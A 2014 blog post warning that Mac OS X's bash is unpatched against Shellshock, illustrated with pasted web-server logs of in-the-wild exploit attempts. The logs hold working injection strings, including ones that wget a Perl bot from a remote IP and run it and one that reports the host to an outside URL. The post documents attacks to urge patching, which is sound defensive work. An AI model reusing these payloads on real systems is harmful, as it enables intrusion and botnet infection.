September 27, 2014
Shellshock and MacOSX
Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash
. Apple has not, despite the fact that it uses bash
as the default system shell (/bin/sh
).
If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system()
. Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web.
internetsurvey-3.erratasec.com - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" - - - hosted-by.snel.com - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-" - - - census1.shodan.io - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" "-" - - - ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - 66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - ns2.rublevski.by - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - - ns2.rublevski.by - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - - 183.16.111.67 - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - - 183.16.111.67 - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - - 183.16.111.67 - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - - 183.16.111.67 - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - - 183.16.111.67 - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - - 183.16.111.67 - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -
Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.
If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.
I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.